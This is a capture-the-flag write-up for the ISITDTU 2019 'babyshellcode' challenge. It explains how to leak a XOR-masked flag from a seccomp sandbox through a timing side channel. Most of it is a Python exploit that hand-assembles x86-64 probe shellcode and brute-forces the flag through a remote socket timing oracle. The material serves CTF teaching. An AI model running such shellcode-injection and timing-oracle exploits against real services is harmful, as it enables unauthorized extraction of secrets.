Tags: shellcode 

Rating: 2.7

This executable reads the flag to `0xcafe000`, XORs the flag with 8 random bytes, zeroes all common registers (everything except `rip`), and then executes whatever we input. A seccomp sandbox only allows us to use `SYS_alarm`.

No usable syscall means no output, so my strategy is a timing `side channel`:

The 8 random bytes sit at `0xcafe028~0xcafe030` (they were XORed with `\x00`, so these 8 bytes are exactly what was read from `/dev/urandom`), and the XORed flag starts at `0xcafe000`. My shellcode reads flag[i] and the random byte that was XORed into it, then does `xor flag[i], random[i]`, which leaves flag[i] in plaintext in a register. It then compares that byte with a guessed value and enters an infinite loop only when the two are equal; otherwise it terminates right away, so the response time tells us whether the guess was right.

Repeating this for every index and every candidate value recovers the flag byte by byte.
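The probe described above, written out as an added example (this is not the original exploit and not the challenge's code). It hand-assembles the x86-64 shellcode for one `(index, guess)` pair, runs the guess loop against a constructed memory image that mimics the `0xcafe000` page, and includes a socket-based timing oracle for the real service. Assumptions not stated on the page: the 8-byte key is applied cyclically (`flag[i] ^ random[i % 8]`), the non-matching path crashes with `ud2` so the process dies quickly, the flag ends with `}`, and the remote protocol is "send raw shellcode, server closes the connection when the process exits".

```python
import socket

FLAG_BASE = 0xcafe000   # flag is read here (from the writeup)
KEY_OFF = 0x28          # the 8 /dev/urandom bytes live at 0xcafe028 (from the writeup)
KEY_LEN = 8             # assumption: key repeats every 8 bytes over the flag


def build_probe(i: int, guess: int) -> bytes:
    """Hand-assembled x86-64 probe that hangs iff flag[i] == guess.

        mov   eax, 0xcafe000
        movzx ebx, byte [rax + i]               ; flag[i] ^ key[i % 8]
        xor   bl,  byte [rax + 0x28 + i % 8]    ; xor the key byte back in -> plaintext
        cmp   bl,  guess
        je    $                                 ; spin forever on a hit
        ud2                                     ; otherwise die fast (assumption)
    """
    assert 0 <= guess < 256 and 0 <= i < KEY_OFF
    code = b"\xb8" + FLAG_BASE.to_bytes(4, "little")                       # mov eax, imm32
    code += b"\x0f\xb6\x98" + i.to_bytes(4, "little")                      # movzx ebx, [rax+disp32]
    code += b"\x32\x98" + (KEY_OFF + i % KEY_LEN).to_bytes(4, "little")    # xor bl, [rax+disp32]
    code += b"\x80\xfb" + bytes([guess])                                   # cmp bl, imm8
    code += b"\x74\xfe"                                                    # je -2 (self loop)
    code += b"\x0f\x0b"                                                    # ud2
    return code


def make_memory(flag: bytes, key: bytes) -> bytes:
    """Constructed stand-in for the page at 0xcafe000: XORed flag, then the key at +0x28."""
    assert len(key) == KEY_LEN and len(flag) <= KEY_OFF
    xored = bytes(b ^ key[n % KEY_LEN] for n, b in enumerate(flag))
    return xored.ljust(KEY_OFF, b"\x00") + key


def local_oracle(mem: bytes):
    """Offline oracle: decode the probe's own operands and evaluate them against `mem`."""
    def hangs(code: bytes) -> bool:
        i = int.from_bytes(code[8:12], "little")        # movzx displacement
        koff = int.from_bytes(code[14:18], "little")    # xor displacement
        guess = code[20]                                # cmp immediate
        return (mem[i] ^ mem[koff]) == guess
    return hangs


def remote_oracle(host: str, port: int, timeout: float = 3.0):
    """Real timing oracle (assumed protocol: raw shellcode in, connection closed on exit)."""
    def hangs(code: bytes) -> bool:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(code)
            try:
                while s.recv(4096):
                    pass
                return False        # server closed the connection: process exited, no hit
            except socket.timeout:
                return True         # still alive after `timeout`: we are in the infinite loop
    return hangs


def recover_flag(hangs, max_len: int = KEY_OFF) -> bytes:
    """Guess each index over printable ASCII; stop at the closing brace (assumption)."""
    out = bytearray()
    for i in range(max_len):
        for g in range(0x20, 0x7f):
            if hangs(build_probe(i, g)):
                out.append(g)
                break
        else:
            raise RuntimeError(f"no printable byte matched at index {i}")
        if g == ord("}"):
            break
    return bytes(out)


if __name__ == "__main__":
    # Constructed flag and key; swap in remote_oracle(host, port) for the live service.
    demo_flag = b"ISITDTU{constructed_flag}"
    demo_key = bytes(range(0x10, 0x18))
    print(recover_flag(local_oracle(make_memory(demo_flag, demo_key))))
```

Each probe costs one connection, so the search is about 95 connections per byte in the worst case; ordering the alphabet by expected frequency (lowercase letters, `_`, digits first) shortens that considerably on a real service.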

> Actually, we don't even need `SYS_alarm`, because 5 seconds is a long time for us to judge whether we are facing an infinite loop.

Read my [exploit](https://github.com/bash-c/pwn_repo/blob/master/ISITDTU2019_babyshellcode/solve.py) for more details and follow [me](https://github.com/bash-c) if you like this Writeup :)

Original writeup (https://github.com/bash-c/pwn_repo/blob/master/ISITDTU2019_babyshellcode/solve.py).